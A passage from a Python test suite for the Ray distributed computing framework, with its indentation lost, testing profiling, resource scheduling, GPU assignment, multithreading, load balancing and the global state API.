assert "fake_directory" == ray.get(get_path1.remote())[-1]
def f(worker_info):
sys.path.pop(-1)
ray.worker.global_worker.run_function_on_all_workers(f)
# Create a second remote function to guarantee that when we call
# get_path2.remote(), the second function to run will have been run on
# the worker.
@ray.remote
def get_path2():
return sys.path
assert "fake_directory" not in ray.get(get_path2.remote())
def test_profiling_api(shutdown_only):
ray.init(num_cpus=2)
@ray.remote
def f():
with ray.profile(
"custom_event",
extra_data={"name": "custom name"}) as ray_prof:
ray_prof.set_attribute("key", "value")
ray.put(1)
object_id = f.remote()
ray.wait([object_id])
ray.get(object_id)
# Wait until all of the profiling information appears in the profile
# table.
timeout_seconds = 20
start_time = time.time()
while True:
if time.time() - start_time > timeout_seconds:
raise Exception("Timed out while waiting for information in "
"profile table.")
profile_data = ray.global_state.chrome_tracing_dump()
event_types = {event["cat"] for event in profile_data}
expected_types = [
"worker_idle",
"task",
"task:deserialize_arguments",
"task:execute",
"task:store_outputs",
"wait_for_function",
"ray.get",
"ray.put",
"ray.wait",
"submit_task",
"fetch_and_run_function",
"register_remote_function",
"custom_event", # This is the custom one from ray.profile.
]
if all(expected_type in event_types
for expected_type in expected_types):
break
@pytest.fixture()
def ray_start_cluster():
cluster = ray.test.cluster_utils.Cluster()
yield cluster
# The code after the yield will run as teardown code.
ray.shutdown()
cluster.shutdown()
def test_object_transfer_dump(ray_start_cluster):
cluster = ray_start_cluster
num_nodes = 3
for i in range(num_nodes):
cluster.add_node(resources={str(i): 1}, object_store_memory=10**9)
ray.init(redis_address=cluster.redis_address)
@ray.remote
def f(x):
return
# These objects will live on different nodes.
object_ids = [
f._remote(args=[1], resources={str(i): 1}) for i in range(num_nodes)
]
# Broadcast each object from each machine to each other machine.
for object_id in object_ids:
ray.get([
f._remote(args=[object_id], resources={str(i): 1})
for i in range(num_nodes)
])
# The profiling information only flushes once every second.
time.sleep(1.1)
transfer_dump = ray.global_state.chrome_tracing_object_transfer_dump()
# Make sure the transfer dump can be serialized with JSON.
json.loads(json.dumps(transfer_dump))
assert len(transfer_dump) >= num_nodes**2
assert len({
event["pid"]
for event in transfer_dump if event["name"] == "transfer_receive"
}) == num_nodes
assert len({
event["pid"]
for event in transfer_dump if event["name"] == "transfer_send"
}) == num_nodes
def test_identical_function_names(shutdown_only):
# Define a bunch of remote functions and make sure that we don't
# accidentally call an older version.
ray.init(num_cpus=1)
num_calls = 200
@ray.remote
def f():
return 1
results1 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 2
results2 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 3
results3 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 4
results4 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 5
results5 = [f.remote() for _ in range(num_calls)]
assert ray.get(results1) == num_calls * [1]
assert ray.get(results2) == num_calls * [2]
assert ray.get(results3) == num_calls * [3]
assert ray.get(results4) == num_calls * [4]
assert ray.get(results5) == num_calls * [5]
@ray.remote
def g():
return 1
@ray.remote # noqa: F811
def g():
return 2
@ray.remote # noqa: F811
def g():
return 3
@ray.remote # noqa: F811
def g():
return 4
@ray.remote # noqa: F811
def g():
return 5
result_values = ray.get([g.remote() for _ in range(num_calls)])
assert result_values == num_calls * [5]
def test_illegal_api_calls(shutdown_only):
ray.init(num_cpus=1)
# Verify that we cannot call put on an ObjectID.
x = ray.put(1)
with pytest.raises(Exception):
ray.put(x)
# Verify that we cannot call get on a regular value.
with pytest.raises(Exception):
ray.get(3)
def test_multithreading(shutdown_only):
# This test requires at least 2 CPUs to finish since the worker does not
# relase resources when joining the threads.
ray.init(num_cpus=2)
@ray.remote
def f():
pass
def g(n):
for _ in range(1000 // n):
ray.get([f.remote() for _ in range(n)])
res = [ray.put(i) for i in range(1000 // n)]
ray.wait(res, len(res))
def test_multi_threading():
threads = [
threading.Thread(target=g, args=(n, ))
for n in [1, 5, 10, 100, 1000]
]
[thread.start() for thread in threads]
[thread.join() for thread in threads]
@ray.remote
def test_multi_threading_in_worker():
test_multi_threading()
def block(args, n):
ray.wait(args, num_returns=n)
ray.get(args[:n])
@ray.remote
class MultithreadedActor(object):
def __init__(self):
pass
def spawn(self):
objects = [f.remote() for _ in range(1000)]
self.threads = [
threading.Thread(target=block, args=(objects, n))
for n in [1, 5, 10, 100, 1000]
]
[thread.start() for thread in self.threads]
def join(self):
[thread.join() for thread in self.threads]
# test multi-threading in the driver
test_multi_threading()
# test multi-threading in the worker
ray.get(test_multi_threading_in_worker.remote())
# test multi-threading in the actor
a = MultithreadedActor.remote()
ray.get(a.spawn.remote())
ray.get(a.join.remote())
def test_free_objects_multi_node(shutdown_only):
# This test will do following:
# 1. Create 3 raylets that each hold an actor.
# 2. Each actor creates an object which is the deletion target.
# 3. Invoke 64 methods on each actor to flush plasma client.
# 4. After flushing, the plasma client releases the targets.
# 5. Check that the deletion targets have been deleted.
# Caution: if remote functions are used instead of actor methods,
# one raylet may create more than one worker to execute the
# tasks, so the flushing operations may be executed in different
# workers and the plasma client holding the deletion target
# may not be flushed.
config = json.dumps({"object_manager_repeated_push_delay_ms": 1000})
ray.worker._init(
start_ray_local=True,
num_local_schedulers=3,
num_cpus=[1, 1, 1],
resources=[{
"Custom0": 1
}, {
"Custom1": 1
}, {
"Custom2": 1
}],
_internal_config=config)
@ray.remote(resources={"Custom0": 1})
class ActorOnNode0(object):
def get(self):
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"Custom1": 1})
class ActorOnNode1(object):
def get(self):
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"Custom2": 1})
class ActorOnNode2(object):
def get(self):
return ray.worker.global_worker.plasma_client.store_socket_name
def create(actors):
a = actors[0].get.remote()
b = actors[1].get.remote()
c = actors[2].get.remote()
(l1, l2) = ray.wait([a, b, c], num_returns=3)
assert len(l1) == 3
assert len(l2) == 0
return (a, b, c)
def flush(actors):
# Flush the Release History.
# Current Plasma Client Cache will maintain 64-item list.
# If the number changed, this will fail.
logger.info("Start Flush!")
for i in range(64):
ray.get([actor.get.remote() for actor in actors])
logger.info("Flush finished!")
def run_one_test(actors, local_only):
(a, b, c) = create(actors)
# The three objects should be generated on different object stores.
assert ray.get(a) != ray.get(b)
assert ray.get(a) != ray.get(c)
assert ray.get(c) != ray.get(b)
ray.internal.free([a, b, c], local_only=local_only)
flush(actors)
return (a, b, c)
actors = [
ActorOnNode0.remote(),
ActorOnNode1.remote(),
ActorOnNode2.remote()
]
# Case 1: run this local_only=False. All 3 objects will be deleted.
(a, b, c) = run_one_test(actors, False)
(l1, l2) = ray.wait([a, b, c], timeout=10, num_returns=1)
# All the objects are deleted.
assert len(l1) == 0
assert len(l2) == 3
# Case 2: run this local_only=True. Only 1 object will be deleted.
(a, b, c) = run_one_test(actors, True)
(l1, l2) = ray.wait([a, b, c], timeout=10, num_returns=3)
# One object is deleted and 2 objects are not.
assert len(l1) == 2
assert len(l2) == 1
# The deleted object will have the same store with the driver.
local_return = ray.worker.global_worker.plasma_client.store_socket_name
for object_id in l1:
assert ray.get(object_id) != local_return
def test_local_mode(shutdown_only):
@ray.remote
def local_mode_f():
return np.array([0, 0])
@ray.remote
def local_mode_g(x):
x[0] = 1
return x
ray.init(local_mode=True)
@ray.remote
def f():
return np.ones([3, 4, 5])
xref = f.remote()
# Remote functions should return by value.
assert_equal(xref, np.ones([3, 4, 5]))
# Check that ray.get is the identity.
assert_equal(xref, ray.get(xref))
y = np.random.normal(size=[11, 12])
# Check that ray.put is the identity.
assert_equal(y, ray.put(y))
# Make sure objects are immutable, this example is why we need to copy
# arguments before passing them into remote functions in python mode
aref = local_mode_f.remote()
assert_equal(aref, np.array([0, 0]))
bref = local_mode_g.remote(aref)
# Make sure local_mode_g does not mutate aref.
assert_equal(aref, np.array([0, 0]))
assert_equal(bref, np.array([1, 0]))
# wait should return the first num_returns values passed in as the
# first list and the remaining values as the second list
num_returns = 5
object_ids = [ray.put(i) for i in range(20)]
ready, remaining = ray.wait(
object_ids, num_returns=num_returns, timeout=None)
assert_equal(ready, object_ids[:num_returns])
assert_equal(remaining, object_ids[num_returns:])
# Test actors in LOCAL_MODE.
@ray.remote
class LocalModeTestClass(object):
def __init__(self, array):
self.array = array
def set_array(self, array):
self.array = array
def get_array(self):
return self.array
def modify_and_set_array(self, array):
array[0] = -1
self.array = array
test_actor = LocalModeTestClass.remote(np.arange(10))
# Remote actor functions should return by value
assert_equal(test_actor.get_array.remote(), np.arange(10))
test_array = np.arange(10)
# Remote actor functions should not mutate arguments
test_actor.modify_and_set_array.remote(test_array)
assert_equal(test_array, np.arange(10))
# Remote actor functions should keep state
test_array[0] = -1
assert_equal(test_array, test_actor.get_array.remote())
# Check that actor handles work in Python mode.
@ray.remote
def use_actor_handle(handle):
array = np.ones(10)
handle.set_array.remote(array)
assert np.alltrue(array == ray.get(handle.get_array.remote()))
ray.get(use_actor_handle.remote(test_actor))
def test_resource_constraints(shutdown_only):
num_workers = 20
ray.init(num_cpus=10, num_gpus=2)
@ray.remote(num_cpus=0)
def get_worker_id():
time.sleep(0.1)
return os.getpid()
# Attempt to wait for all of the workers to start up.
while True:
if len(
set(
ray.get([
get_worker_id.remote() for _ in range(num_workers)
]))) == num_workers:
break
time_buffer = 0.3
# At most 10 copies of this can run at once.
@ray.remote(num_cpus=1)
def f(n):
time.sleep(n)
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(10)])
duration = time.time() - start_time
assert duration < 0.5 + time_buffer
assert duration > 0.5
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(11)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
@ray.remote(num_cpus=3)
def f(n):
time.sleep(n)
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(3)])
duration = time.time() - start_time
assert duration < 0.5 + time_buffer
assert duration > 0.5
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(4)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
@ray.remote(num_gpus=1)
def f(n):
time.sleep(n)
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(2)])
duration = time.time() - start_time
assert duration < 0.5 + time_buffer
assert duration > 0.5
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(3)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(4)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
def test_multi_resource_constraints(shutdown_only):
num_workers = 20
ray.init(num_cpus=10, num_gpus=10)
@ray.remote(num_cpus=0)
def get_worker_id():
time.sleep(0.1)
return os.getpid()
# Attempt to wait for all of the workers to start up.
while True:
if len(
set(
ray.get([
get_worker_id.remote() for _ in range(num_workers)
]))) == num_workers:
break
@ray.remote(num_cpus=1, num_gpus=9)
def f(n):
time.sleep(n)
@ray.remote(num_cpus=9, num_gpus=1)
def g(n):
time.sleep(n)
time_buffer = 0.3
start_time = time.time()
ray.get([f.remote(0.5), g.remote(0.5)])
duration = time.time() - start_time
assert duration < 0.5 + time_buffer
assert duration > 0.5
start_time = time.time()
ray.get([f.remote(0.5), f.remote(0.5)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
start_time = time.time()
ray.get([g.remote(0.5), g.remote(0.5)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
start_time = time.time()
ray.get([f.remote(0.5), f.remote(0.5), g.remote(0.5), g.remote(0.5)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
def test_gpu_ids(shutdown_only):
num_gpus = 10
ray.init(num_cpus=10, num_gpus=num_gpus)
@ray.remote(num_gpus=0)
def f0():
time.sleep(0.1)
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 0
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
for gpu_id in gpu_ids:
assert gpu_id in range(num_gpus)
return gpu_ids
@ray.remote(num_gpus=1)
def f1():
time.sleep(0.1)
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
for gpu_id in gpu_ids:
assert gpu_id in range(num_gpus)
return gpu_ids
@ray.remote(num_gpus=2)
def f2():
time.sleep(0.1)
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 2
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
for gpu_id in gpu_ids:
assert gpu_id in range(num_gpus)
return gpu_ids
@ray.remote(num_gpus=3)
def f3():
time.sleep(0.1)
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 3
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
for gpu_id in gpu_ids:
assert gpu_id in range(num_gpus)
return gpu_ids
@ray.remote(num_gpus=4)
def f4():
time.sleep(0.1)
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 4
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
for gpu_id in gpu_ids:
assert gpu_id in range(num_gpus)
return gpu_ids
@ray.remote(num_gpus=5)
def f5():
time.sleep(0.1)
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 5
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
for gpu_id in gpu_ids:
assert gpu_id in range(num_gpus)
return gpu_ids
# Wait for all workers to start up.
@ray.remote
def f():
time.sleep(0.1)
return os.getpid()
start_time = time.time()
while True:
if len(set(ray.get([f.remote() for _ in range(10)]))) == 10:
break
if time.time() > start_time + 10:
raise Exception("Timed out while waiting for workers to start "
"up.")
list_of_ids = ray.get([f0.remote() for _ in range(10)])
assert list_of_ids == 10 * [[]]
list_of_ids = ray.get([f1.remote() for _ in range(10)])
set_of_ids = {tuple(gpu_ids) for gpu_ids in list_of_ids}
assert set_of_ids == {(i, ) for i in range(10)}
list_of_ids = ray.get([f2.remote(), f4.remote(), f4.remote()])
all_ids = [gpu_id for gpu_ids in list_of_ids for gpu_id in gpu_ids]
assert set(all_ids) == set(range(10))
remaining = [f5.remote() for _ in range(20)]
for _ in range(10):
t1 = time.time()
ready, remaining = ray.wait(remaining, num_returns=2)
t2 = time.time()
# There are only 10 GPUs, and each task uses 2 GPUs, so there
# should only be 2 tasks scheduled at a given time, so if we wait
# for 2 tasks to finish, then it should take at least 0.1 seconds
# for each pair of tasks to finish.
assert t2 - t1 > 0.09
list_of_ids = ray.get(ready)
all_ids = [gpu_id for gpu_ids in list_of_ids for gpu_id in gpu_ids]
# Commenting out the below assert because it seems to fail a lot.
# assert set(all_ids) == set(range(10))
# Test that actors have CUDA_VISIBLE_DEVICES set properly.
@ray.remote
class Actor0(object):
def __init__(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 0
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
# Set self.x to make sure that we got here.
self.x = 1
def test(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 0
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
return self.x
@ray.remote(num_gpus=1)
class Actor1(object):
def __init__(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
# Set self.x to make sure that we got here.
self.x = 1
def test(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
return self.x
a0 = Actor0.remote()
ray.get(a0.test.remote())
a1 = Actor1.remote()
ray.get(a1.test.remote())
def test_zero_cpus(shutdown_only):
ray.init(num_cpus=0)
@ray.remote(num_cpus=0)
def f():
return 1
# The task should be able to execute.
ray.get(f.remote())
def test_zero_cpus_actor(shutdown_only):
ray.worker._init(
start_ray_local=True, num_local_schedulers=2, num_cpus=[0, 2])
local_plasma = ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote
class Foo(object):
def method(self):
return ray.worker.global_worker.plasma_client.store_socket_name
# Make sure tasks and actors run on the remote local scheduler.
a = Foo.remote()
assert ray.get(a.method.remote()) != local_plasma
def test_fractional_resources(shutdown_only):
ray.init(num_cpus=6, num_gpus=3, resources={"Custom": 1})
@ray.remote(num_gpus=0.5)
class Foo1(object):
def method(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
return gpu_ids[0]
foos = [Foo1.remote() for _ in range(6)]
gpu_ids = ray.get([f.method.remote() for f in foos])
for i in range(3):
assert gpu_ids.count(i) == 2
del foos
@ray.remote
class Foo2(object):
def method(self):
pass
# Create an actor that requires 0.7 of the custom resource.
f1 = Foo2._remote([], {}, resources={"Custom": 0.7})
ray.get(f1.method.remote())
# Make sure that we cannot create an actor that requires 0.7 of the
# custom resource. TODO(rkn): Re-enable this once ray.wait is
# implemented.
f2 = Foo2._remote([], {}, resources={"Custom": 0.7})
ready, _ = ray.wait([f2.method.remote()], timeout=500)
assert len(ready) == 0
# Make sure we can start an actor that requries only 0.3 of the custom
# resource.
f3 = Foo2._remote([], {}, resources={"Custom": 0.3})
ray.get(f3.method.remote())
del f1, f3
# Make sure that we get exceptions if we submit tasks that require a
# fractional number of resources greater than 1.
@ray.remote(num_cpus=1.5)
def test():
pass
with pytest.raises(ValueError):
test.remote()
with pytest.raises(ValueError):
Foo2._remote([], {}, resources={"Custom": 1.5})
def test_multiple_local_schedulers(shutdown_only):
# This test will define a bunch of tasks that can only be assigned to
# specific local schedulers, and we will check that they are assigned
# to the correct local schedulers.
address_info = ray.worker._init(
start_ray_local=True,
num_local_schedulers=3,
num_cpus=[11, 5, 10],
num_gpus=[0, 5, 1])
# Define a bunch of remote functions that all return the socket name of
# the plasma store. Since there is a one-to-one correspondence between
# plasma stores and local schedulers (at least right now), this can be
# used to identify which local scheduler the task was assigned to.
# This must be run on the zeroth local scheduler.
@ray.remote(num_cpus=11)
def run_on_0():
return ray.worker.global_worker.plasma_client.store_socket_name
# This must be run on the first local scheduler.
@ray.remote(num_gpus=2)
def run_on_1():
return ray.worker.global_worker.plasma_client.store_socket_name
# This must be run on the second local scheduler.
@ray.remote(num_cpus=6, num_gpus=1)
def run_on_2():
return ray.worker.global_worker.plasma_client.store_socket_name
# This can be run anywhere.
@ray.remote(num_cpus=0, num_gpus=0)
def run_on_0_1_2():
return ray.worker.global_worker.plasma_client.store_socket_name
# This must be run on the first or second local scheduler.
@ray.remote(num_gpus=1)
def run_on_1_2():
return ray.worker.global_worker.plasma_client.store_socket_name
# This must be run on the zeroth or second local scheduler.
@ray.remote(num_cpus=8)
def run_on_0_2():
return ray.worker.global_worker.plasma_client.store_socket_name
def run_lots_of_tasks():
names = []
results = []
for i in range(100):
index = np.random.randint(6)
if index == 0:
names.append("run_on_0")
results.append(run_on_0.remote())
elif index == 1:
names.append("run_on_1")
results.append(run_on_1.remote())
elif index == 2:
names.append("run_on_2")
results.append(run_on_2.remote())
elif index == 3:
names.append("run_on_0_1_2")
results.append(run_on_0_1_2.remote())
elif index == 4:
names.append("run_on_1_2")
results.append(run_on_1_2.remote())
elif index == 5:
names.append("run_on_0_2")
results.append(run_on_0_2.remote())
return names, results
store_names = address_info["object_store_addresses"]
def validate_names_and_results(names, results):
for name, result in zip(names, ray.get(results)):
if name == "run_on_0":
assert result in [store_names[0]]
elif name == "run_on_1":
assert result in [store_names[1]]
elif name == "run_on_2":
assert result in [store_names[2]]
elif name == "run_on_0_1_2":
assert (result in [
store_names[0], store_names[1], store_names[2]
])
elif name == "run_on_1_2":
assert result in [store_names[1], store_names[2]]
elif name == "run_on_0_2":
assert result in [store_names[0], store_names[2]]
else:
raise Exception("This should be unreachable.")
assert set(ray.get(results)) == set(store_names)
names, results = run_lots_of_tasks()
validate_names_and_results(names, results)
# Make sure the same thing works when this is nested inside of a task.
@ray.remote
def run_nested1():
names, results = run_lots_of_tasks()
return names, results
@ray.remote
def run_nested2():
names, results = ray.get(run_nested1.remote())
return names, results
names, results = ray.get(run_nested2.remote())
validate_names_and_results(names, results)
def test_custom_resources(shutdown_only):
ray.worker._init(
start_ray_local=True,
num_local_schedulers=2,
num_cpus=[3, 3],
resources=[{
"CustomResource": 0
}, {
"CustomResource": 1
}])
@ray.remote
def f():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource": 1})
def g():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource": 1})
def h():
ray.get([f.remote() for _ in range(5)])
return ray.worker.global_worker.plasma_client.store_socket_name
# The f tasks should be scheduled on both local schedulers.
assert len(set(ray.get([f.remote() for _ in range(50)]))) == 2
local_plasma = ray.worker.global_worker.plasma_client.store_socket_name
# The g tasks should be scheduled only on the second local scheduler.
local_scheduler_ids = set(ray.get([g.remote() for _ in range(50)]))
assert len(local_scheduler_ids) == 1
assert list(local_scheduler_ids)[0] != local_plasma
# Make sure that resource bookkeeping works when a task that uses a
# custom resources gets blocked.
ray.get([h.remote() for _ in range(5)])
def test_two_custom_resources(shutdown_only):
ray.worker._init(
start_ray_local=True,
num_local_schedulers=2,
num_cpus=[3, 3],
resources=[{
"CustomResource1": 1,
"CustomResource2": 2
}, {
"CustomResource1": 3,
"CustomResource2": 4
}])
@ray.remote(resources={"CustomResource1": 1})
def f():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource2": 1})
def g():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource1": 1, "CustomResource2": 3})
def h():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource1": 4})
def j():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource3": 1})
def k():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
# The f and g tasks should be scheduled on both local schedulers.
assert len(set(ray.get([f.remote() for _ in range(50)]))) == 2
assert len(set(ray.get([g.remote() for _ in range(50)]))) == 2
local_plasma = ray.worker.global_worker.plasma_client.store_socket_name
# The h tasks should be scheduled only on the second local scheduler.
local_scheduler_ids = set(ray.get([h.remote() for _ in range(50)]))
assert len(local_scheduler_ids) == 1
assert list(local_scheduler_ids)[0] != local_plasma
# Make sure that tasks with unsatisfied custom resource requirements do
# not get scheduled.
ready_ids, remaining_ids = ray.wait([j.remote(), k.remote()], timeout=500)
assert ready_ids == []
def test_many_custom_resources(shutdown_only):
num_custom_resources = 10000
total_resources = {
str(i): np.random.randint(1, 7)
for i in range(num_custom_resources)
}
ray.init(num_cpus=5, resources=total_resources)
def f():
return 1
remote_functions = []
for _ in range(20):
num_resources = np.random.randint(0, num_custom_resources + 1)
permuted_resources = np.random.permutation(
num_custom_resources)[:num_resources]
random_resources = {
str(i): total_resources[str(i)]
for i in permuted_resources
}
remote_function = ray.remote(resources=random_resources)(f)
remote_functions.append(remote_function)
remote_functions.append(ray.remote(f))
remote_functions.append(ray.remote(resources=total_resources)(f))
results = []
for remote_function in remote_functions:
results.append(remote_function.remote())
results.append(remote_function.remote())
results.append(remote_function.remote())
ray.get(results)
@pytest.fixture
def save_gpu_ids_shutdown_only():
# Record the curent value of this environment variable so that we can
# reset it after the test.
original_gpu_ids = os.environ.get("CUDA_VISIBLE_DEVICES", None)
yield None
# The code after the yield will run as teardown code.
ray.shutdown()
# Reset the environment variable.
if original_gpu_ids is not None:
os.environ["CUDA_VISIBLE_DEVICES"] = original_gpu_ids
else:
del os.environ["CUDA_VISIBLE_DEVICES"]
def test_specific_gpus(save_gpu_ids_shutdown_only):
allowed_gpu_ids = [4, 5, 6]
os.environ["CUDA_VISIBLE_DEVICES"] = ",".join(
[str(i) for i in allowed_gpu_ids])
ray.init(num_gpus=3)
@ray.remote(num_gpus=1)
def f():
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
assert gpu_ids[0] in allowed_gpu_ids
@ray.remote(num_gpus=2)
def g():
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 2
assert gpu_ids[0] in allowed_gpu_ids
assert gpu_ids[1] in allowed_gpu_ids
ray.get([f.remote() for _ in range(100)])
ray.get([g.remote() for _ in range(100)])
def test_blocking_tasks(shutdown_only):
ray.init(num_cpus=1)
@ray.remote
def f(i, j):
return (i, j)
@ray.remote
def g(i):
# Each instance of g submits and blocks on the result of another
# remote task.
object_ids = [f.remote(i, j) for j in range(2)]
return ray.get(object_ids)
@ray.remote
def h(i):
# Each instance of g submits and blocks on the result of another
# remote task using ray.wait.
object_ids = [f.remote(i, j) for j in range(2)]
return ray.wait(object_ids, num_returns=len(object_ids))
ray.get([h.remote(i) for i in range(4)])
@ray.remote
def _sleep(i):
time.sleep(0.01)
return (i)
@ray.remote
def sleep():
# Each instance of sleep submits and blocks on the result of
# another remote task, which takes some time to execute.
ray.get([_sleep.remote(i) for i in range(10)])
ray.get(sleep.remote())
def test_max_call_tasks(shutdown_only):
ray.init(num_cpus=1)
@ray.remote(max_calls=1)
def f():
return os.getpid()
pid = ray.get(f.remote())
ray.test.test_utils.wait_for_pid_to_exit(pid)
@ray.remote(max_calls=2)
def f():
return os.getpid()
pid1 = ray.get(f.remote())
pid2 = ray.get(f.remote())
assert pid1 == pid2
ray.test.test_utils.wait_for_pid_to_exit(pid1)
def attempt_to_load_balance(remote_function,
args,
total_tasks,
num_local_schedulers,
minimum_count,
num_attempts=100):
attempts = 0
while attempts < num_attempts:
locations = ray.get(
[remote_function.remote(*args) for _ in range(total_tasks)])
names = set(locations)
counts = [locations.count(name) for name in names]
logger.info("Counts are {}.".format(counts))
if (len(names) == num_local_schedulers
and all(count >= minimum_count for count in counts)):
break
attempts += 1
assert attempts < num_attempts
def test_load_balancing(shutdown_only):
# This test ensures that tasks are being assigned to all local
# schedulers in a roughly equal manner.
num_local_schedulers = 3
num_cpus = 7
ray.worker._init(
start_ray_local=True,
num_local_schedulers=num_local_schedulers,
num_cpus=num_cpus)
@ray.remote
def f():
time.sleep(0.01)
return ray.worker.global_worker.plasma_client.store_socket_name
attempt_to_load_balance(f, [], 100, num_local_schedulers, 10)
attempt_to_load_balance(f, [], 1000, num_local_schedulers, 100)
def test_load_balancing_with_dependencies(shutdown_only):
# This test ensures that tasks are being assigned to all local
# schedulers in a roughly equal manner even when the tasks have
# dependencies.
num_local_schedulers = 3
ray.worker._init(
start_ray_local=True,
num_local_schedulers=num_local_schedulers,
num_cpus=1)
@ray.remote
def f(x):
time.sleep(0.010)
return ray.worker.global_worker.plasma_client.store_socket_name
# This object will be local to one of the local schedulers. Make sure
# this doesn't prevent tasks from being scheduled on other local
# schedulers.
x = ray.put(np.zeros(1000000))
attempt_to_load_balance(f, [x], 100, num_local_schedulers, 25)
def wait_for_num_tasks(num_tasks, timeout=10):
start_time = time.time()
while time.time() - start_time < timeout:
if len(ray.global_state.task_table()) >= num_tasks:
return
time.sleep(0.1)
raise Exception("Timed out while waiting for global state.")
def wait_for_num_objects(num_objects, timeout=10):
start_time = time.time()
while time.time() - start_time < timeout:
if len(ray.global_state.object_table()) >= num_objects:
return
time.sleep(0.1)
raise Exception("Timed out while waiting for global state.")
@pytest.mark.skipif(
os.environ.get("RAY_USE_NEW_GCS") == "on",
reason="New GCS API doesn't have a Python API yet.")
def test_global_state_api(shutdown_only):
with pytest.raises(Exception):
ray.global_state.object_table()
with pytest.raises(Exception):
ray.global_state.task_table()
with pytest.raises(Exception):
ray.global_state.client_table()
with pytest.raises(Exception):
ray.global_state.function_table()
with pytest.raises(Exception):
ray.global_state.log_files()
ray.init(num_cpus=5, num_gpus=3, resources={"CustomResource": 1})
resources = {"CPU": 5, "GPU": 3, "CustomResource": 1}
assert ray.global_state.cluster_resources() == resources
assert ray.global_state.object_table() == {}
driver_id = ray.experimental.state.binary_to_hex(
ray.worker.global_worker.worker_id)
driver_task_id = ray.experimental.state.binary_to_hex(
ray.worker.global_worker.current_task_id.id())
# One task is put in the task table which corresponds to this driver.
wait_for_num_tasks(1)
task_table = ray.global_state.task_table()
assert len(task_table) == 1
assert driver_task_id == list(task_table.keys())[0]
task_spec = task_table[driver_task_id]["TaskSpec"]
assert task_spec["TaskID"] == driver_task_id
assert task_spec["ActorID"] == ray_constants.ID_SIZE * "ff"
assert task_spec["Args"] == []
assert task_spec["DriverID"] == driver_id
assert task_spec["FunctionID"] == ray_constants.ID_SIZE * "ff"
assert task_spec["ReturnObjectIDs"] == []
client_table = ray.global_state.client_table()
node_ip_address = ray.worker.global_worker.node_ip_address
assert len(client_table) == 1
assert client_table[0]["NodeManagerAddress"] == node_ip_address
@ray.remote
def f(*xs):
return 1
x_id = ray.put(1)
result_id = f.remote(1, "hi", x_id)
# Wait for one additional task to complete.
wait_for_num_tasks(1 + 1)
task_table = ray.global_state.task_table()
assert len(task_table) == 1 + 1
task_id_set = set(task_table.keys())
task_id_set.remove(driver_task_id)
task_id = list(task_id_set)[0]
function_table = ray.global_state.function_table()
task_spec = task_table[task_id]["TaskSpec"]
assert task_spec["ActorID"] == ray_constants.ID_SIZE * "ff"
assert task_spec["Args"] == [1, "hi", x_id]
assert task_spec["DriverID"] == driver_id
assert task_spec["ReturnObjectIDs"] == [result_id]
function_table_entry = function_table[task_spec["FunctionID"]]
assert function_table_entry["Name"] == "runtest.f"
assert function_table_entry["DriverID"] == driver_id
